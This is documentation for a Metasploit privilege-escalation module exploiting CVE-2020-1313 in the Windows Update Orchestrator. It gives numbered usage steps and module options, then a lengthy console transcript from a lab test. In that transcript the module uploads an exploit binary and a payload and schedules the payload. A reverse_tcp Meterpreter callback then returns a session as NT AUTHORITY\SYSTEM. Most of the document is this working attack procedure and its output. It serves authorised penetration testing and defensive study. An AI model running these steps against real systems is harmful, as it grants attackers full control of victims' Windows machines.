## Vulnerable Application

Windows 10 and Server x64 build versions above 17763  to 19041.

### Introduction

This module abuses CVE-2020-1313, a unchecked API call that allows a
regular user to schedule a job that will run as system.  The API call,
`ScheduleWork`, will create a task in the System Update Orchestrator
automatically scheduled to run at a time when the system is expected
to be idle.  The user cannot request or affect the scheduled time of
execution.  The scheduled job data is stored in
`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\x`
Where `x` is a numeric key assigned to the job.

## Verification Steps

  1. Start msfconsole
  2.  use exploit/multi/handler
  3. set payload <payload>
  4. set [r|l]host
  5. run (leave running)
  6. Start msfconsole
  7. use windows/local/cve_2020_1313_system_orchestrator
  8. set session <session>
  9. set payload <payload_matching_above>
  10. set verbose true
  11. Verify The job is scheduled
  12. Leave everything running
  13. Go to bed
  14. Have a healthy Breakfast, maybe some coffee if you want
  15. verify you got a callback as SYSTEM

## Options

  **EXECUTE_DELAY**
  The number of seconds to sleep after uploading the exploit and
  launching it.

  **EXPLOIT_NAME**
  The name of the exploit EXE as it will appear on target
  
  **EXPLOIT_TIMEOUT**
  The maximum time to wait for a response from the exploit binary.

  **PAYLOAD_NAME**
  The name of the payload EXE as it will appear on target

  **WRITABLE_DIR**
  Directory to use for file upload and linking; this should not already
  exist.  This directory will require manual cleanup.

## Scenarios

### Tested on Windows10 x64 Release 1903

```
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 12 opened (192.168.135.197:4567 -> 192.168.132.134:49678) at 2020-09-21 19:05:44 -0500
sessions -i -1
[*] Starting interaction with 12...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 12...
msf exploit(windows/local/cve_2020_1313_system_orchestrator) > show options

Module options (exploit/windows/local/cve_2020_1313_system_orchestrator):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   SESSION          11               yes       The session to run this module on.
   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4568             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf exploit(windows/local/cve_2020_1313_system_orchestrator) > set session 12
session => 12
msf exploit(windows/local/cve_2020_1313_system_orchestrator) > run

[*] Build Number = 18362
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 12
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
[*] Uploading Payload to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\DZrvSSK.exe
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\DZrvSSK.exe
[*] Running Exploit
[*] Exploit Output:
Obtaining reference to IUniversalOrchestrator
Scheduling work with id 47790
Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.
[*] Cleaning up C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
[*] C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
[+] Payload Scheduled for execution at 2020-09-22 08:53:47 -0500
msf exploit(windows/local/cve_2020_1313_system_orchestrator) > 

[SECONDARY WINDOW FOR CALLBACK]
msf payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run -j
msf exploit(multi/handler) > jobs -l

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4444

msf exploit(multi/handler) > set lport 4568
lport => 4568
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.135.197:4568 
msf exploit(multi/handler) > jobs -l

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4444
  1   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4568

msf exploit(multi/handler) > 
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4568 -> 192.168.132.134:49681) at 2020-09-21 20:09:45 -0500
msf exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-CL5L2IH  192.168.135.197:4568 -> 192.168.132.134:49681 (192.168.132.134)

msf exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```
